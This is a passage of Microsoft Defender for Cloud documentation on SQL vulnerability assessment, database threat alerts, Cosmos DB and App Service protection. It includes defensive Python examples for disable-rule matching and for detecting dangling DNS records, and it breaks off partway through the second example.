• Container registry images should have vulnerability findings resolved (powered by Qualys)
• SQL databases should have vulnerability findings resolved
• SQL servers on machines should have vulnerability findings resolved


The 'Vulnerability Assessment Findings' report gathers all of these findings and organizes them by severity, resource type, and category. You can find the report in the workbooks gallery available from Defender for Cloud's sidebar.


[Screenshot: Microsoft Defender for Cloud | Workbooks | Vulnerability Assessment Findings (Preview) workbook. Tabs: Overview, Machines, SQL. The "Vulnerable SQL resources" table lists each resource group and machine with Total, High, Medium and Low finding counts; "Vulnerable databases per server" breaks the counts down per database; the "Vulnerabilities" table is grouped by resource and can be filtered by resource, resource group, severity, etc.]


Disable specific findings 


If you have an organizational need to ignore a finding, rather than remediate it, you can optionally disable it. Disabled findings don't impact your secure score or generate unwanted noise.


When a finding matches the criteria you've defined in your disable rules, it won't appear 
in the list of findings. Typical scenarios include: 


• Disable findings with severity below medium
• Disable findings that are non-patchable
• Disable findings from benchmarks that aren't of interest for a defined scope


Important


To disable specific findings, you need permissions to edit a policy in Azure Policy. 
Learn more in Azure RBAC permissions in Azure Policy. 


To create a rule: 


1. From the recommendations detail page for SQL servers on machines should have vulnerability findings resolved, select Disable rule.


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


   • Finding ID
   • Severity
   • Benchmarks


[Screenshot: Disable rule (Preview) pane opened from the recommendation. Criteria: "Disable findings that match any of the following criteria" with parameters IDs (for example VA1258), Minimum severity and Benchmarks, plus an optional Justification. The pane notes that new disable rules applied to a subscription might take up to 30 minutes to take effect, that rules on a management group take longer, and that a rule on a management group applies to or overrides any rules on the underlying subscriptions. Buttons: Apply rule, Cancel.]


4. Select Apply rule. Changes might take up to 24 hours to take effect.
5. To view, override, or delete a rule:
   a. Select Disable rule.
   b. From the scope list, subscriptions with active rules show as Rule applied.


[Screenshot: the Disable rule scope list ("You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your secure score"), listing subscriptions with their current status. Subscriptions with an active rule show Rule applied, and the ellipsis menu offers View rule and Delete rule.]


c. To view or delete the rule, select the ellipsis menu ("..."). 
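The criteria above can be dry-run against a scan before a rule is applied in the portal. The following Python model is an added example, not Microsoft's code and not a call to any Azure API: it assumes "match any criterion" semantics for IDs, minimum severity and benchmarks, reads Minimum severity as the lowest severity that stays visible (so findings below it are disabled), and models the pane's note that a rule on a management group overrides rules on its subscriptions. The finding IDs and descriptions are taken from the screenshot on this page; the severities, benchmark names and justifications are constructed sample values.

```python
"""Dry run of Defender for Cloud 'disable rule' criteria against SQL VA findings.

Added example for this article; it is not Microsoft's code and does not call
Azure. The matching semantics are an assumption modelled on the page: a rule
names finding IDs, a minimum severity and benchmarks, and a finding is hidden
when it matches ANY of them. 'Minimum severity' is read here as the lowest
severity that stays visible, so findings below it are disabled.
"""
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple

# Order used to compare a finding's severity with the rule's minimum severity.
SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3}


@dataclass(frozen=True)
class Finding:
    """One SQL Vulnerability Assessment finding."""
    finding_id: str
    severity: str
    benchmark: str
    description: str


@dataclass(frozen=True)
class DisableRule:
    """Criteria from the 'Disable rule' pane; an empty set or None means 'not set'."""
    finding_ids: FrozenSet[str] = frozenset()
    min_severity: Optional[str] = None
    benchmarks: FrozenSet[str] = frozenset()
    justification: str = ""

    def matches(self, f: Finding) -> bool:
        """True when the finding matches any configured criterion (OR semantics)."""
        if f.finding_id in self.finding_ids:
            return True
        if self.min_severity and SEVERITY_RANK[f.severity] < SEVERITY_RANK[self.min_severity]:
            return True
        return f.benchmark in self.benchmarks


def effective_rule(mg_rule: Optional[DisableRule],
                   sub_rule: Optional[DisableRule]) -> Optional[DisableRule]:
    """A rule on the management group applies to, and overrides, rules on its subscriptions."""
    return mg_rule if mg_rule is not None else sub_rule


def apply_rule(findings: List[Finding],
               rule: Optional[DisableRule]) -> Tuple[List[Finding], List[Finding]]:
    """Split findings into (visible, disabled); only visible ones count toward secure score."""
    if rule is None:
        return list(findings), []
    visible = [f for f in findings if not rule.matches(f)]
    disabled = [f for f in findings if rule.matches(f)]
    return visible, disabled


# Constructed sample scan: the IDs and descriptions appear in the article's
# screenshot; the severities and benchmark names are made up for this example.
SAMPLE_FINDINGS = [
    Finding("VA1059", "High", "CIS", "xp_cmdshell should be disabled"),
    Finding("VA1258", "Medium", "CIS", "Database owners are as expected"),
    Finding("VA1018", "High", "FedRAMP", "Latest updates should be installed"),
    Finding("VA2120", "Low", "CIS", "Features that may affect security should be disabled"),
    Finding("VA1279", "Medium", "CIS", "Force encryption should be enabled for TDS"),
]

# Constructed rules: the subscription owner wanted only VA1059 hidden, but a
# management-group rule also exists and takes precedence.
SUBSCRIPTION_RULE = DisableRule(finding_ids=frozenset({"VA1059"}),
                                justification="accepted risk, tracked elsewhere")
MANAGEMENT_GROUP_RULE = DisableRule(finding_ids=frozenset({"VA1258"}),
                                    min_severity="Medium",
                                    benchmarks=frozenset({"FedRAMP"}),
                                    justification="org-wide noise reduction")


def dry_run() -> Tuple[List[str], List[str]]:
    """Return (visible IDs, disabled IDs) for the sample scan under the effective rule."""
    rule = effective_rule(MANAGEMENT_GROUP_RULE, SUBSCRIPTION_RULE)
    visible, disabled = apply_rule(SAMPLE_FINDINGS, rule)
    return [f.finding_id for f in visible], [f.finding_id for f in disabled]


if __name__ == "__main__":
    shown, hidden = dry_run()
    print("visible (count toward secure score):", shown)
    print("disabled by rule:", hidden)
```

Running the module shows that the management-group rule hides VA1258 (by ID), VA1018 (by benchmark) and VA2120 (below the Medium minimum), while the subscription's own rule for VA1059 is overridden and that finding stays visible. Keeping the justification on the rule object mirrors the optional Justification field in the pane and makes a later audit of "why is this hidden?" straightforward.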


Manage vulnerability assessments programmatically


Using Azure PowerShell 


You can use Azure PowerShell cmdlets to programmatically manage your vulnerability assessments. The supported cmdlets are:

Cmdlet name                                           Description
Add-AzSecuritySqlVulnerabilityAssessmentBaseline      Adds a SQL Vulnerability Assessment baseline.
Get-AzSecuritySqlVulnerabilityAssessmentBaseline      Gets a SQL Vulnerability Assessment baseline.
Get-AzSecuritySqlVulnerabilityAssessmentScanResult    Gets SQL Vulnerability Assessment scan results.
Get-AzSecuritySqlVulnerabilityAssessmentScanRecord    Gets SQL Vulnerability Assessment scan records.
Remove-AzSecuritySqlVulnerabilityAssessmentBaseline   Removes a SQL Vulnerability Assessment baseline.
Set-AzSecuritySqlVulnerabilityAssessmentBaseline      Sets a new SQL Vulnerability Assessment baseline on a specific database, discarding the old baseline if one exists.


Data residency


SQL Vulnerability Assessment queries the SQL server using publicly available queries under Defender for Cloud recommendations for SQL Vulnerability Assessment, and stores the query results. SQL Vulnerability Assessment data is stored in the location of the Log Analytics workspace that the machine is connected to. For example, if the user connects a SQL Virtual Machine to a Log Analytics workspace in West Europe, the results will be stored in West Europe. This data will be collected only if the SQL Vulnerability Assessment solution is enabled on the Log Analytics workspace.


Metadata information about the connected machine is also collected. Specifically:

- Operating system name, type, and version
- Computer fully qualified domain name (FQDN)
- Connected Machine agent version
- UUID (BIOS ID)
- SQL server name and underlying database names


You can specify the region where your SQL Vulnerability Assessment data will be stored by choosing the Log Analytics workspace location. Microsoft may replicate to other regions for data resiliency, but Microsoft does not replicate data outside the geography.


Next steps 


Learn more about Defender for Cloud's protections for SQL resources in Overview of Microsoft Defender for SQL.


Overview of Microsoft Defender for open-source relational databases

This plan brings threat protections for the following open-source relational databases:


- Azure Database for PostgreSQL
- Azure Database for MySQL
- Azure Database for MariaDB


Defender for Cloud detects anomalous activities indicating unusual and potentially 
harmful attempts to access or exploit databases. The plan makes it simple to address 
potential threats to databases without the need to be a security expert or manage 
advanced security monitoring systems. 


Availability

Aspect                              Details
Release state:                      General availability (GA)
Pricing:                            Microsoft Defender for open-source relational databases is billed as shown on the pricing page
Supported environments:             ✔ PaaS
                                    ✘ Azure Arc-enabled machines
Protected versions of PostgreSQL:   Single Server - General Purpose and Memory Optimized. Learn more in PostgreSQL pricing tiers.
Protected versions of MySQL:        Single Server - General Purpose and Memory Optimized. Learn more in MySQL pricing tiers.
Protected versions of MariaDB:      General Purpose and Memory Optimized. Learn more in MariaDB pricing tiers.
Clouds:                             ✔ Commercial clouds
                                    ✔ Azure Government
                                    ✘ Microsoft Azure operated by 21Vianet


What are the benefits of Microsoft Defender for open-source relational databases?


Defender for Cloud provides security alerts on anomalous activities so that you can 
detect potential threats and respond to them as they occur. 


When you enable this plan, Defender for Cloud will provide alerts when it detects 
anomalous database access and query patterns as well as suspicious database activities. 


These alerts appear in Defender for Cloud's security alerts page and include: 


- details of the suspicious activity that triggered them
- the associated MITRE ATT&CK tactic
- recommended actions for how to investigate and mitigate the threat
- options for continuing your investigations with Microsoft Sentinel


[Screenshot: the Microsoft Defender for Cloud | Security alerts page. The list shows alerts such as Attempted logon by a potentially harmful application (postgresql), Suspected brute force attack (mysql2), Suspected brute force attack using a valid user (postgresql) and Login from a principal user not seen in 60 days (postgresql). The details pane for Suspected brute force attack shows the description "A potential brute force attack has been detected on your resource.", the affected resource, the subscription, the MITRE ATT&CK tactic (Pre-attack) and the View full details and Take action options.]


What kind of alerts does Microsoft Defender for open-source relational databases provide?


Threat intelligence enriched security alerts are triggered when there are: 


- Anomalous database access and query patterns - For example, an abnormally high number of failed sign-in attempts with different credentials (a brute force attempt)
- Suspicious database activities - For example, a legitimate user accessing an SQL Server from a breached computer which communicated with a crypto-mining C&C server
- Brute-force attacks - With the ability to separate simple brute force from brute force on a valid user or a successful brute force


Tip

View the full list of security alerts for database servers in the alerts reference page.


Next steps 


In this article, you learned about Microsoft Defender for open-source relational 
databases. 


Enable enhanced protections 


Enable Microsoft Defender for open-source relational databases and respond to alerts

Microsoft Defender for Cloud detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases for the following services:


- Azure Database for PostgreSQL
- Azure Database for MySQL
- Azure Database for MariaDB


To get alerts from the Microsoft Defender plan you'll first need to enable it as shown 
below. 


Learn more about this Microsoft Defender plan in Overview of Microsoft Defender for 
open-source relational databases. 


Enable enhanced security 


1. From the Azure portal, open the configuration page of the database server you want to protect.


2. From the security menu on the left, select Microsoft Defender for Cloud. 


3. If enhanced security isn't enabled, you'll see a button as shown in the following 
screenshot. Select Enable Microsoft Defender for [Database type] (for example, 
"Microsoft Defender for MySQL") and select Save. 


[Screenshot: the mysql11 | Microsoft Defender for Cloud page of an Azure Database for MySQL server. The status reads "Microsoft Defender for MySQL: Disabled" next to an Enable Microsoft Defender for MySQL button, with the note "You are invited to a 30-day trial, free of charge. After the trial ends, you will be charged $15/server/month". The Recommendations section below lists Public network access should be disabled for MySQL servers (Medium), Private endpoint should be enabled for MySQL servers (Medium), Geo-redundant backup should be enabled for Azure Database for MySQL (Low) and Audit diagnostic setting (Low), with a link to view additional recommendations in Microsoft Defender for Cloud.]


Tip

This page in the portal will be the same regardless of the database type (PostgreSQL, MySQL, or MariaDB).


Respond to security alerts 


When Microsoft Defender for Cloud is enabled on your database, it detects anomalous 
activities and generates alerts. These alerts are available from multiple locations, 
including: 


- In the Azure portal:
  - Microsoft Defender for Cloud's security alerts page - Shows alerts for all resources protected by Defender for Cloud in the subscriptions you've got permissions to view.
  - The resource's Microsoft Defender for Cloud page - Shows alerts and recommendations for one specific resource, as shown above in Enable enhanced security.
- In the inbox of whoever in your organization has been designated to receive email alerts.


Tip

A live tile on Microsoft Defender for Cloud's overview dashboard tracks the status of active threats to all your resources including databases. Select the security alerts tile to go to the Defender for Cloud security alerts page and get an overview of active threats detected on your databases.


For detailed steps and the recommended method to respond to security alerts, see Respond to a security alert.


Respond to email notifications of security alerts 


Defender for Cloud sends email notifications when it detects anomalous database 
activities. The email includes details of the suspicious security event such as the nature 
of the anomalous activities, database name, server name, application name, and event 
time. The email also provides information on possible causes and recommended actions 
to investigate and mitigate any potential threats to the database. 


1. From the email, select the View the full alert link to launch the Azure portal and 
show the security alerts page, which provides an overview of active threats 
detected on the database. 


[Screenshot: the alert notification email]

From: Microsoft Azure <azure-noreply@microsoft.com>
Sent: Wednesday, May 19, 2021 12:17 PM
Subject: Microsoft Defender for Cloud has detected suspicious activity in your environment

HIGH SEVERITY
Microsoft Defender for Cloud has detected suspicious activity in your resource

Suspected brute force attack
A potential brute force attack has been detected on your resource.
May 19, 2021 9:16 UTC

Affected PostgreSQL Server: postgres...    Detected by: Microsoft

View the full alert >

Activity details
Subscription: DataPlayground (ID redacted in the screenshot)
Alert ID: (redacted in the screenshot)


View active threats at the subscription level from within the Defender for Cloud portal pages:


[Screenshot: the Microsoft Defender for Cloud | Security alerts page showing 73 subscriptions, filtered to Resource type == SQLServer, with active alerts by severity High (8), Medium (5), Low (3). Alert titles include Potential SQL Brute Force attempt and Attempted logon by a potentially harmful application (MITRE ATT&CK tactic: Pre-attack), Potential SQL injection, Unusual export location (Exfiltration), Logon from an unusual location and Login from an unusual data center (Initial Access), A possible vulnerability to SQL Injection, and Login from a principal user not seen in 60 days (Initial Access), each with its affected resource, activity start time and status.]


2. For additional details and recommended actions for investigating the current 
threat and remediating future threats, select a specific alert. 


[Screenshot: the details pane for the alert Logon from an unusual location (Medium, Active). Alert description: "Someone logged on to your resource from an unusual location." The pane shows the affected resource, the subscription, the MITRE ATT&CK tactic (Initial Access) and a Take action button.]


Tip

For a detailed tutorial on how to handle your alerts, see Tutorial: Triage, investigate, and respond to security alerts.


Next steps 


- Automate responses to Defender for Cloud triggers
- Stream alerts to a SIEM, SOAR, or ITSM solution
- Suppress alerts from Defender for Cloud


Overview of Microsoft Defender for Azure Cosmos DB

Microsoft Defender for Azure Cosmos DB detects potential SQL injections, known bad actors based on Microsoft Threat Intelligence, suspicious access patterns, and potential exploitation of your database through compromised identities, or malicious insiders.


Defender for Azure Cosmos DB uses advanced threat detection capabilities, and 
Microsoft Threat Intelligence’ data to provide contextual security alerts. Those alerts 
also include steps to mitigate the detected threats and prevent future attacks. 


You can enable protection for all your databases (recommended), or enable Microsoft 
Defender for Azure Cosmos DB at either the subscription level, or the resource level. 


Defender for Azure Cosmos DB continually analyzes the telemetry stream generated by the Azure Cosmos DB service. When potentially malicious activities are detected, security alerts are generated. These alerts are displayed in Defender for Cloud together with the details of the suspicious activity along with the relevant investigation steps, remediation actions, and security recommendations.


Defender for Azure Cosmos DB doesn't access the Azure Cosmos DB account data, and 
doesn't have any effect on its performance. 


Availability 


Aspect                              Details
Release state:                      General Availability (GA)
Protected Azure Cosmos DB APIs:     ✔ Azure Cosmos DB for NoSQL
                                    ✘ Azure Cosmos DB for Apache Cassandra
                                    ✘ Azure Cosmos DB for MongoDB
                                    ✘ Azure Cosmos DB for Table
                                    ✘ Azure Cosmos DB for Apache Gremlin
Clouds:                             ✔ Commercial clouds
                                    ✘ Azure Government
                                    ✘ Azure China 21Vianet


What are the benefits of Microsoft Defender for Azure Cosmos DB?


Microsoft Defender for Azure Cosmos DB uses advanced threat detection capabilities 
and Microsoft Threat Intelligence data. Defender for Azure Cosmos DB continuously 
monitors your Azure Cosmos DB accounts for threats such as SQL injection, 
compromised identities and data exfiltration. 


This service provides action-oriented security alerts in Microsoft Defender for Cloud with 
details of the suspicious activity and guidance on how to mitigate the threats. You can 
use this information to quickly remediate security issues and improve the security of 
your Azure Cosmos DB accounts. 


Alerts include details of the incident that triggered them, and recommendations on how to investigate and remediate threats. Alerts can be exported to Microsoft Sentinel or to any third-party SIEM or other external tool. To learn how to stream alerts, see Stream alerts to a SIEM, SOAR, or ITSM solution.


Tip

For a comprehensive list of all Defender for Azure Cosmos DB alerts, see the alerts reference page. This is useful for workload owners who want to know what threats can be detected and helps SOC teams gain familiarity with detections before investigating them. Learn more about what's in a Defender for Cloud security alert, and how to manage your alerts in Manage and respond to security alerts in Microsoft Defender for Cloud.


Alert types 


Threat intelligence security alerts are triggered for: 


- Potential SQL injection attacks: Due to the structure and capabilities of Azure Cosmos DB queries, many known SQL injection attacks can't work in Azure Cosmos DB. However, there are some variations of SQL injections that can succeed and may result in exfiltrating data from your Azure Cosmos DB accounts. Defender for Azure Cosmos DB detects both successful and failed attempts, and helps you harden your environment to prevent these threats.

- Anomalous database access patterns: For example, access from a TOR exit node, known suspicious IP addresses, unusual applications, and unusual locations.

- Suspicious database activity: For example, suspicious key-listing patterns that resemble known malicious lateral movement techniques and suspicious data extraction patterns.


Next steps 


In this article, you learned about Microsoft Defender for Azure Cosmos DB. 


Enable Microsoft Defender for Azure Cosmos DB 


Enable Microsoft Defender for Azure Cosmos DB

Microsoft Defender for Azure Cosmos DB protection is available at both the subscription level and the resource level. You can enable Microsoft Defender for Cloud on your subscription to protect all database types on your subscription, including Microsoft Defender for Azure Cosmos DB (recommended). You can also choose to enable Microsoft Defender for Azure Cosmos DB at the resource level to protect a specific Azure Cosmos DB account.


Prerequisites 


- An Azure account. If you don't already have an Azure account, you can create your Azure free account today.


Enable database protection at the subscription level

The subscription level enablement enables Microsoft Defender for Cloud protection for all database types in your subscription (recommended).


You can enable Microsoft Defender for Cloud protection on your subscription in order 
to protect all database types, for example, Azure Cosmos DB, Azure SQL Database, 
Azure SQL servers on machines, and OSS RDBs. You can also select specific resource 
types to protect when you configure your plan. 


When you enable Microsoft Defender for Cloud's enhanced security features on your subscription, Microsoft Defender for Azure Cosmos DB is automatically enabled for all of your Azure Cosmos DB accounts.

To enable database protection at the subscription level:

1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Environment settings.
3. Select the relevant subscription.
4. Locate Databases and toggle the switch to On.

[Screenshot: the Defender plans page with the Databases plan toggled On, the note "Defender for Cloud plans will be enabled on 3 resources in this subscription", and an Enable all option.]

5. Select Save.
To select specific resource types to protect when you configure your plan:

1. Follow steps 1 - 4 above.
2. Select Select types.

[Screenshot: the Databases plan row (Protected: 0/30 instances, Selected: 0/4, Preview features included) with the Select types link.]

3. Toggle the desired resource type switches to On.

[Screenshot: the Database types selection pane with On toggles for Azure SQL Databases, SQL servers on machines, Open source relational databases and Azure Cosmos DB, each showing its pricing and resource quantity. The pane warns: "Excluding and reincluding resource in the plan will affect the coverage and billing. If there are no resources in the subscription, billing won't apply even if the resource type is included."]

4. Select Confirm.


Enable Microsoft Defender for Azure Cosmos DB at the resource level


You can enable Microsoft Defender for Cloud on a specific Azure Cosmos DB account 
through the Azure portal, PowerShell, Azure CLI, ARM template, or Azure Policy. 


To enable Microsoft Defender for Cloud for a specific Azure Cosmos DB account: 


Azure portal 


1. Sign in to the Azure portal.


2. Navigate to your Azure Cosmos DB account > Settings. 


3. Select Microsoft Defender for Cloud. 


4. Select Enable Microsoft Defender for Azure Cosmos DB. 


[Screenshot: the myCosmosAccount | Microsoft Defender for Cloud page of an Azure Cosmos DB account. It explains that Microsoft Defender for Azure Cosmos DB is an Azure-native layer of security that detects attempts to exploit databases in your Azure Cosmos DB SQL API accounts, detecting potential SQL injections, known bad actors based on Microsoft Threat Intelligence, suspicious access patterns, and potential exploitation of your database through compromised identities or malicious insiders. It links to enabling Defender for Cloud on all the databases in the subscription and offers an Enable Microsoft Defender for Azure Cosmos DB button for this specific account, with a 30-day free trial after which the standard tier is charged: for Provisioned Throughput accounts, $0.0012 per 100 RU/s per hour; for Serverless accounts, the total RU is converted to provisioned throughput using a conversion factor of 0.00003125.]


Simulate security alerts from Microsoft Defender for Azure Cosmos DB

A full list of supported alerts is available in the reference table of all Defender for Cloud security alerts.

You can use sample Microsoft Defender for Azure Cosmos DB alerts to evaluate their value and capabilities. Sample alerts will also validate any configurations you've made for your security alerts (such as SIEM integrations, workflow automation, and email notifications).


To create sample alerts from Microsoft Defender for Azure Cosmos DB: 


1. Sign in to the Azure portal as a Subscription Contributor user.


2. Navigate to the security alerts page. 


3. Select Sample alerts. 


4. Select the subscription. 


5. Select the relevant Microsoft Defender plan(s). 


6. Select Create sample alerts. 


[Screenshot: the Create sample alerts (Preview) pane on the Security alerts page ("Try Microsoft Defender for Cloud alerts by creating sample alerts from our different Microsoft Defender for Cloud plans"). You choose the subscription and the Microsoft Defender for Cloud plans (for example App Services, Key Vaults, Kubernetes Services, Azure SQL Database, Storage Accounts and Virtual Machines) and then select Create sample alerts. The alerts list in the background shows sample alerts such as Suspicious process executed.]


After a few minutes, the alerts will appear in the security alerts page. Alerts will also 
appear anywhere that you've configured to receive your Microsoft Defender for Cloud 
security alerts. For example, connected SIEMs, and email notifications. 


Next steps 


In this article, you learned how to enable Microsoft Defender for Azure Cosmos DB, and 
how to simulate security alerts. 


Automate responses to Microsoft Defender for Cloud triggers


Common questions about Defender for Databases


FAQ 


Get answers to common questions about Microsoft Defender for Databases. 


If I enable this Microsoft Defender plan on my subscription, are all SQL servers on the subscription protected?

No. To defend a SQL Server deployment on an Azure virtual machine, or a SQL Server running on an Azure Arc-enabled machine, Defender for Cloud requires:

- a Log Analytics agent on the machine
- the relevant Log Analytics workspace to have the Microsoft Defender for SQL solution enabled

The subscription status, shown in the SQL server page in the Azure portal, reflects the default workspace status and applies to all connected machines. Only the SQL servers on hosts with a Log Analytics agent reporting to that workspace are protected by Defender for Cloud.


Is there a performance effect from deploying Microsoft Defender for Azure SQL on machines?

The focus of Microsoft Defender for SQL on machines is obviously security. But we also care about your business and so we've prioritized performance to ensure the minimal effect on your SQL servers.

The service has a split architecture to balance data uploading and speed with performance:

- Some of our detectors, including an extended events trace named SQLAdvancedThreatProtectionTraffic, run on the machine for real-time speed advantages.
- Other detectors run in the cloud to spare the machine from heavy computational loads.

Lab tests of our solution showed CPU usage averaging 3% for peak slices, comparing it against benchmark loads. An analysis of our current user data shows a negligible effect on CPU and memory usage.

Performance always varies between environments, machines, and loads. The statements are provided as a general guideline, not a guarantee for any individual deployment.


What happens to the old scan results and baselines after I switch to express configuration?


Old results and baselines settings remain available on your storage account, but won't 
be updated or used by the system. You don't need to maintain these files for SQL 
vulnerability assessment to work after you switch to express configuration, but you can 
keep your old baseline definitions for future reference. 


When express configuration is enabled, you don't have direct access to the result and 
baseline data because it's stored on internal Microsoft storage. 


Can I set up recurring scans with express configuration?


Express configuration automatically sets up recurring scans for all databases under your 
server. This is the default and isn't configurable at server or database level. 


Is there a way with express configuration to get the weekly email report that is provided in the classic configuration?


You can use workflow automation and Logic Apps email scheduling, following the 
Microsoft Defender for Cloud processes: 


- Time based triggers
- Scan based triggers
- Support for disabled rules


Why can't I set database policies anymore?


SQL vulnerability assessment reports all vulnerabilities and misconfigurations in your 
environment, so it helps to have all databases included. Defender for SQL is billed per 
server, not per database. 


Can I revert to the classic configuration? 


Yes. You can revert to the classic configuration using the existing REST APIs and 
PowerShell cmdlets. When you revert to the classic configuration, you see a 
notification in the Azure portal to change to the express configuration. 


Will we see express configuration for other types of SQL? 


Stay tuned for updates! 


Can I choose which experience is the default? 


No. Express configuration is the default for every new supported Azure SQL database. 


Does express configuration change scan behavior? 


No, express configuration provides the same scanning behavior and performance. 


Does express configuration have any effect on pricing? 


Express configuration doesn't require a storage account, so you don't need to pay extra 
storage fees unless you choose to keep old scan and baseline data. 


What does the 1-MB cap per rule mean? 


Any individual rule can't produce results that are more than 1 MB. When that limit is 
reached, the results for the rule are stopped. You can't set a baseline for the rule, the 
rule isn't included in the overall recommendation health, and the results are shown as 
"Not applicable". 


Next steps 


Learn about Defender for Databases 


Overview of Defender for App Service to protect your Azure App Service web apps and APIs 


Prerequisites 


Defender for Cloud is natively integrated with App Service, eliminating the need for 
deployment and onboarding - the integration is transparent. 


To protect your Azure App Service plan with Microsoft Defender for App Service, you'll 
need: 


• A supported App Service plan associated with dedicated machines. Supported 
  plans are listed in Availability. 
• Defender for Cloud's enhanced protections enabled on your subscription as 
  described in Quickstart: Enable enhanced security features. 


Tip 

You can optionally enable individual Microsoft Defender plans, like Microsoft 
Defender for App Service. 


Availability 


Aspect                        Details 
Release state:                General availability (GA) 
Pricing:                      Microsoft Defender for App Service is billed as shown on the 
                              pricing page. Billing is according to total compute instances 
                              in all plans. 
Supported App Service plans:  Free plan; Basic Service plan; Standard Service plan; 
                              Premium v2 Service Plan; Premium v3 Service Plan; App Service 
                              Environment v1; App Service Environment v2; App Service 
                              Environment v3 
Clouds:                       Commercial clouds; National (Azure Government, Azure China 
                              21Vianet) 


What are the benefits of Microsoft Defender 
for App Service? 


Azure App Service is a fully managed platform for building and hosting your web apps 
and APIs. Since the platform is fully managed, you don't have to worry about the 
infrastructure. It provides management, monitoring, and operational insights to meet 
enterprise-grade performance, security, and compliance requirements. For more 
information, see Azure App Service. 


Microsoft Defender for App Service uses the scale of the cloud to identify attacks 
targeting applications running over App Service. Attackers probe web applications to 
find and exploit weaknesses. Before being routed to specific environments, requests to 
applications running in Azure go through several gateways, where they're inspected and 
logged. This data is then used to identify exploits and attackers, and to learn new 
patterns that will be used later. 


When you enable Microsoft Defender for App Service, you immediately benefit from the 
following services offered by this Defender plan: 


• Secure - Defender for App Service assesses the resources covered by your App 
  Service plan and generates security recommendations based on its findings. Use 
  the detailed instructions in these recommendations to harden your App Service 
  resources. 
• Detect - Defender for App Service detects a multitude of threats to your App 
  Service resources by monitoring: 
    - the VM instance in which your App Service is running, and its management 
      interface 
    - the requests and responses sent to and from your App Service apps 
    - the underlying sandboxes and VMs 
    - App Service internal logs - available thanks to the visibility that Azure has as a 
      cloud provider 


As a cloud-native solution, Defender for App Service can identify attack methodologies 
applying to multiple targets. For example, from a single host it would be difficult to 
identify a distributed attack from a small subset of IPs, crawling to similar endpoints on 
multiple hosts. 


The log data and the infrastructure together can tell the story: from a new attack 
circulating in the wild to compromises in customer machines. Therefore, even if 
Microsoft Defender for App Service is deployed after a web app has been exploited, it 
might be able to detect ongoing attacks. 


What threats can Defender for App Service 
detect? 


Threats by MITRE ATT&CK tactics 


Defender for Cloud monitors for many threats to your App Service resources. The alerts 
cover almost the complete list of MITRE ATT&CK tactics from pre-attack to command 
and control. 


• Pre-attack threats - Defender for Cloud can detect the execution of multiple types 
  of vulnerability scanners that attackers frequently use to probe applications for 
  weaknesses. 
• Initial access threats - Microsoft Threat Intelligence powers these alerts, which 
  include an alert when a known malicious IP address connects to your Azure App 
  Service FTP interface. 
• Execution threats - Defender for Cloud can detect attempts to run high privilege 
  commands, Linux commands on a Windows App Service, fileless attack behavior, 
  digital currency mining tools, and many other suspicious and malicious code 
  execution activities. 


Dangling DNS detection 


Defender for App Service also identifies any DNS entries remaining in your DNS registrar 
when an App Service website is decommissioned - these are known as dangling DNS 
entries. When you remove a website and don't remove its custom domain from your 
DNS registrar, the DNS entry is pointing to a non-existent resource, and your 
subdomain is vulnerable to a takeover. Defender for Cloud doesn't scan your DNS 
registrar for existing dangling DNS entries; it alerts you when an App Service website is 
decommissioned and its custom domain (DNS entry) isn't deleted. 


Subdomain takeovers are a common, high-severity threat for organizations. When a 
threat actor detects a dangling DNS entry, they create their own site at the destination 
address. The traffic intended for the organization's domain is then directed to the threat 
actor's site, and they can use that traffic for a wide range of malicious activity. 


Dangling DNS protection is available whether your domains are managed with Azure 
DNS or an external domain registrar and applies to App Service on both Windows and 
Linux. 
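Defender for Cloud alerts on the decommissioning event but, as stated above, does not scan your registrar for records that are already dangling. The script below is an added example, not Microsoft's code: it walks the CNAME records of a zone export, follows chains of CNAMEs inside the zone (the indirect case the Note later in this article says Defender may miss), and flags any record that ends at a *.azurewebsites.net hostname that is no longer in your App Service inventory. The zone records, the live-host list and the helper names are constructed for this example.

```python
"""Find dangling CNAME records that still point at decommissioned App Service sites.

Added example (not Microsoft's code). Compare the CNAME records of a DNS zone
against the default hostnames of the App Service sites that still exist; anything
that resolves, directly or through a chain of in-zone CNAMEs, to a
*.azurewebsites.net name that is no longer live is a takeover candidate.
All data below is constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Default hostname domain that App Service assigns to every web app.
APP_SERVICE_SUFFIX = ".azurewebsites.net"


@dataclass(frozen=True)
class DnsRecord:
    name: str    # owner name, e.g. "shop.example.com"
    rtype: str   # "CNAME", "A", "TXT", ...
    value: str   # CNAME target, address, or text


@dataclass(frozen=True)
class Finding:
    name: str                 # record in your zone that is dangling
    target: str               # App Service hostname the chain ends at
    chain: Tuple[str, ...]    # in-zone CNAMEs walked between the two


def canon(host: str) -> str:
    """DNS names are case-insensitive and may carry a trailing dot."""
    return host.strip().rstrip(".").lower()


def resolve_chain(name: str, cnames: Dict[str, str],
                  max_hops: int = 8) -> Tuple[str, Tuple[str, ...]]:
    """Follow CNAMEs that are defined inside the zone.

    Returns the final target and the intermediate names. Stops on a loop or
    after max_hops so a broken zone cannot hang the check.
    """
    visited = [canon(name)]
    while visited[-1] in cnames and len(visited) <= max_hops:
        nxt = cnames[visited[-1]]
        if nxt in visited:          # CNAME loop inside the zone
            break
        visited.append(nxt)
    return visited[-1], tuple(visited[1:-1])


def find_dangling(records: Iterable[DnsRecord],
                  live_hosts: Iterable[str]) -> List[Finding]:
    """Return every CNAME that ends at an App Service hostname not in live_hosts.

    Custom domains bound through A records (with an asuid TXT record) are not
    covered by this check; only CNAME chains are walked.
    """
    live = {canon(h) for h in live_hosts}
    cnames = {canon(r.name): canon(r.value)
              for r in records if r.rtype.upper() == "CNAME"}
    findings = []
    for name in sorted(cnames):
        target, chain = resolve_chain(name, cnames)
        if not target.endswith(APP_SERVICE_SUFFIX):
            continue                # not an App Service default hostname; out of scope here
        if target not in live:
            findings.append(Finding(name, target, chain))
    return findings


# Constructed zone export for example.com. Only the *.azurewebsites.net targets matter.
SAMPLE_ZONE = [
    DnsRecord("www.example.com", "CNAME", "shop.example.com."),             # indirect, via shop
    DnsRecord("shop.example.com", "CNAME", "contoso-shop.azurewebsites.net"),
    DnsRecord("blog.example.com", "CNAME", "contoso-blog.azurewebsites.net"),
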